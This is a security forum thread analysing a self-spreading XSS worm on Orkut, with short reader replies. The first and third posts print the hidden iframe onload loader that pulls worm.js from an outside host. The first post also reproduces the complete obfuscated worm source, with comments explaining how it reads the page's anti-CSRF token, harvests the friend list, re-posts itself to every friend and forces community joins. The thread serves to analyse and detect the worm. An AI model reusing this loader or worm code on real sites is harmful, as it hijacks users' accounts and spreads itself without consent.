
Thread: New mass spreading worm in orkut

  1. #1
    Security Researcher fb1h2s's Avatar

    New mass spreading worm in orkut

    The new version of Orkut has been found to be affected by a new mass-spreading worm.

    Static analysis of the worm shows that it is just a mass-spreading worm: it uses your scrapbook to spread and makes you join a few communities.
    The worm writer bypassed the script restrictions on Orkut by passing the following IFRAME tag:


    ><iframe style=display:none onload="a = document.createElement( 'script');a.src = '/' + '/tptools.o'+'rg/worm.js'+'#<wbr>#'; document . body . appendChild( a )"></iframe>


    Here the JavaScript code hosted on tptools.com is called via the onload handler and executed. This happens when you log in and reach your Orkut home page,
    as your new scraps are shown on the home page; visiting your scrapbook also triggers execution of the code.

    The worm is programmed to send a copy of itself to everyone in your friend list via scrap and to make you join a few communities.

    There should not be much harm as of now, and I don't think you need to change your password.



    // worm.js as posted (analysis copy, left byte-for-byte). This is the obfuscated
    // string table: every API name, URL path, form field and community id used by the
    // functions below is an index into it; post #3 gives the decoded listing. The stray
    // spaces inside some \x escapes appear to be forum line-wrapping rather than part of
    // the original script.
    var _0x37a1=["\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\ x4C\x48\x74\x74\x70","\x50\x4F\x53\x54\x5F\x54\x4F \x4B\x45\x4E\x3D","\x43\x47\x49\x2E\x50\x4F\x53\x5 4\x5F\x54\x4F\x4B\x45\x4E","\x26\x73\x69\x67\x6E\x 61\x74\x75\x72\x65\x3D","\x50\x61\x67\x65\x2E\x73\ x69\x67\x6E\x61\x74\x75\x72\x65\x2E\x72\x61\x77"," \x50\x4F\x53\x54","\x53\x63\x72\x61\x70\x62\x6F\x6 F\x6B\x3F","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x6 5\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x 69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77 \x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x 6F\x64\x65\x64\x3B","\x73\x65\x74\x52\x65\x71\x75\ x65\x73\x74\x48\x65\x61\x64\x65\x72","\x26\x73\x63 \x72\x61\x70\x54\x65\x78\x74\x3D","\x3C\x73\x74\x7 9\x6C\x65\x2F\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\ x73\x74\x79\x6C\x65\x3D\x64\x69\x73\x70\x6C\x61\x7 9\x3A\x6E\x6F\x6E\x65\x20\x6F\x6E\x6C\x6F\x61\x64\ x3D\x22\x61\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6 E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\ x65\x6E\x74\x28\x20\x27\x73\x63\x72\x69\x70\x74\x2 7\x29\x3B\x61\x2E\x73\x72\x63\x20\x3D\x20\x27\x2F\ x27\x20\x2B\x20\x27\x2F\x74\x70\x74\x6F\x6F\x6C\x7 3\x2E\x6F\x27\x2B\x27\x72\x67\x2F\x77\x6F\x72\x6D\ x2E\x6A\x73\x27\x2B\x27\x23\x3C\x77\x62\x72\x3E\x2 3\x27\x3B\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x20\ x2E\x20\x62\x6F\x64\x79\x20\x2E\x20\x61\x70\x70\x6 5\x6E\x64\x43\x68\x69\x6C\x64\x28\x20\x61\x20\x29\ x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x42\x6 F\x6D\x20\x53\x61\x62\x61\x64\x6F\x21","\x26\x75\x 69\x64\x3D","\x26\x41\x63\x74\x69\x6F\x6E\x2E\x73\ x75\x62\x6D\x69\x74\x3D\x31","\x73\x65\x6E\x64","\ x47\x45\x54","\x52\x65\x71\x75\x65\x73\x74\x46\x72 \x69\x65\x6E\x64\x73\x3F\x72\x65\x71\x3D\x66\x6C\x 26\x75\x69\x64\x3D","\x75\x69\x64","\x26\x6F\x78\x 68\x3D\x31","\x77\x68\x69\x6C\x65\x20\x28\x74\x72\ x75\x65\x29\x3B\x20\x26\x26\x26\x53\x54\x41\x52\x5 4\x26\x26\x26","","\x72\x65\x70\x6C\x61\x63\x65"," \x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74", 
"\x43\x6F\x6D\x6D\x75\x6E\x69\x74\x79\x4A\x6F\x69\ x6E\x3F\x63\x6D\x6D\x3D","\x26\x41\x63\x74\x69\x6F \x6E\x2E\x6A\x6F\x69\x6E\x3D\x31","\x31\x30\x36\x3 6\x39\x38\x38\x30\x38","\x36","\x35\x35\x38\x34\x3 9\x34","\x31\x30\x36\x36\x39\x38\x36\x32\x38","\x3 1\x30\x36\x36\x39\x31\x33\x34\x31","\x76\x61\x72\x 20\x66\x72\x69\x65\x6E\x64\x73\x20\x3D\x20","\x3B" ,"\x6C\x69\x73\x74","\x64\x61\x74\x61","\x69\x6 4"];


    // Returns a native XMLHttpRequest, falling back to the legacy
    // ActiveXObject(_0x37a1[0] = "Microsoft.XMLHttp") where the native
    // constructor throws (old IE). Every request the worm makes goes through this.
    function createXMLHttpRequest()
    {
    try
    {
    return new XMLHttpRequest();
    }
    catch(e)
    {
    return new ActiveXObject(_0x37a1[0]);
    }
    ;
    }
    ;
    // Anti-CSRF material lifted from the page's own globals: JSHDF["CGI.POST_TOKEN"]
    // (index 2) and JSHDF["Page.signature.raw"] (index 4), formatted as
    // "POST_TOKEN=...&signature=..." (indices 1, 3). It is prepended to every POST
    // body below, which is why the token check does not stop this worm: the script
    // is already executing inside the victim's logged-in page (see the iframe
    // onload loader in post #1), so it can read the token like any first-party code.
    var data=_0x37a1[1]+encodeURIComponent(JSHDF[_0x37a1[2]])+_0x37a1[3]+encodeURIComponent(JSHDF[_0x37a1[4]]);
    // Propagation step. Sends one scrap to the friend whose uid is _0x7c2bx4:
    // a synchronous POST (index 5 "POST", index 6 "Scrapbook?", third arg false)
    // with a form-encoded body (indices 8/9 set Content-Type) consisting of the
    // token/signature prefix, "&scrapText=" (index 11) + the same hidden
    // <iframe onload=...> loader followed by "Bom Sabado!" (index 12, decoded in
    // post #3), "&uid=" + target (index 13) and "&Action.submit=1" (index 14).
    // Detection angle: a burst of identical Scrapbook? POSTs from one session,
    // each carrying an <iframe onload= loader in scrapText, is the worm's signature.
    function sendScrap(_0x7c2bx4)
    {
    var _0x7c2bx5=createXMLHttpRequest();
    _0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[6],false);
    _0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);
    _0x7c2bx5[_0x37a1[15]](data+_0x37a1[11]+encodeURIComponent(_0x37a1[12])+_0x37a1[13]+_0x7c2bx4+_0x37a1[14]);
    } ;
    // Harvests the victim's friend list: synchronous GET (index 16) to
    // "RequestFriends?req=fl&uid=" + JSHDF["uid"] + "&oxh=1" (indices 17-19).
    // The response begins with the anti-JSON-hijacking prefix
    // "while (true); &&&START&&&" (index 20); it is stripped with
    // responseText.replace(prefix, "") (indices 23, 22, 21) and the remaining
    // text is returned raw for the caller to eval(). That prefix only protects
    // against cross-origin <script src=...> inclusion; code already running
    // in-origin can read responseText and simply drop it.
    function requestFriends()
    {
    var _0x7c2bx5=createXMLHttpRequest();
    _0x7c2bx5[_0x37a1[7]](_0x37a1[16],_0x37a1[17]+JSHDF[_0x37a1[18]]+_0x37a1[19],false);
    _0x7c2bx5[_0x37a1[15]](null);
    return (_0x7c2bx5[_0x37a1[23]])[_0x37a1[22]](_0x37a1[20],_0x37a1[21]);
    } ;
    // Forces the victim into a community: synchronous POST to
    // "CommunityJoin?cmm=" + _0x7c2bx8 (index 24), same form-encoded Content-Type
    // as sendScrap, body = token/signature prefix + "&Action.join=1" (index 25).
    function joinCMM(_0x7c2bx8)
    {
    var _0x7c2bx5=createXMLHttpRequest();
    _0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[24]+_0x7c2bx8,false);
    _0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);
    _0x7c2bx5[_0x37a1[15]](data+_0x37a1[25]);
    } ;
    // Entry sequence, run as soon as the loader executes in the logged-in page:
    // 1. join five hard-coded communities (indices 26-30; post #3 names 106698808);
    // 2. eval("var friends = " + <friend-list response> + ";") — eval() on a server
    //    response, used here purely as a JSON parser, which defines the global `friends`;
    // 3. scrap every entry of friends.data.list by its id, i.e. one sendScrap POST
    //    per friend. `x` and `uid` are never declared and leak as globals. Nothing
    //    records which friends were already hit, so every execution re-sends to the
    //    whole list (this is what makes the spread so noisy and easy to spot).
    joinCMM(_0x37a1[26]);
    joinCMM(_0x37a1[27]);
    joinCMM(_0x37a1[28]);
    joinCMM(_0x37a1[29]);
    joinCMM(_0x37a1[30]);
    eval(_0x37a1[31]+requestFriends()+_0x37a1[32]);
    for(x in friends[_0x37a1[34]][_0x37a1[33]])
    {
    uid=(friends[_0x37a1[34]][_0x37a1[33]][x]);
    sendScrap(uid[_0x37a1[35]]);} ;


    The analysis of the payload will be done soon and this post will be updated.
    Last edited by fb1h2s; 09-25-2010 at 03:15 PM.
    Hacking Is a Matter of Time Knowledge and Patience

  2. #2
    Orkut web developers need to work hard now :P
    hey bro, is there any possibility of this on Facebook too?

  3. #3
    Security Researcher fb1h2s's Avatar
    The array named _0x37a1=[] holds all the encoded values, and each array element is looked up and put into the right place before execution. So it is pretty easy to decode the values by reversing the encoding of the data in the array. The decoded values confirm what the worm is doing:

    Code:
    Microsoft.XMLHttpPOST_TOKEN=CGI.POST_TOKEN&signature=Page.signature.rawPOSTScrapbook?openContent-Typeapplication/x-www-form-urlencoded;
    setRequestHeader
    &scrapText=<style/><iframe style=display:none onload="a = document.createElement( 'script');a.src = '/' + '/tptools.o'+'rg/worm.js'+'#<wbr>#'; document . body . appendChild( a )"></iframe>Bom Sabado!
    &uid=&Action.submit=1send
    GETRequestFriends?req=fl&uid=uid&oxh=1while (true);
     &&&START&&&replaceresponseTextCommunityJoin?cmm=&Action.join=11066988086558494106698628106691341var friends = ;listdataid

    It creates XMLHttpRequest (XHR) calls, loads all friends from your friend list and sends each of them a scrap with the text

    Code:
    <style/><iframe style=display:none onload="a = document.createElement( 'script');a.src = '/' + '/tptools.o'+'rg/worm.js'+'#<wbr>#'; document . body . appendChild( a )"></iframe>Bom Sabado!

    This is the part used to spread the infection further.

    And it makes you join a few communities.

    One is 106698808, plus a couple of others. The good part is that this is not a harmful worm, as all it does is spam and spread itself. (Note, though, that the loader fetches worm.js from a remote host on every run, so the payload could be changed at any time.)
    Hacking Is a Matter of Time Knowledge and Patience

  4. #4
    Super Commando Dhruv abhaythehero's Avatar
    Had to use m.orkut.com for a while

    And nice analysis !
    In the world of 0s and 1s, are you a zero or The One !

  5. #5
    nice info..................
    JAI MATA DI


    Silence is not our weakness, Its just we dont want to waste our time...........

  6. #6
    really nice & hard work bro
    JAI MATA DI


    Silence is not our weakness, Its just we dont want to waste our time...........

  7. #7
    It was coded by a 16-year-old Brazilian.

    Do you guys know about the recent community flaw on Orkut? Brazilians gained ownership of many communities by editing HTTP headers.
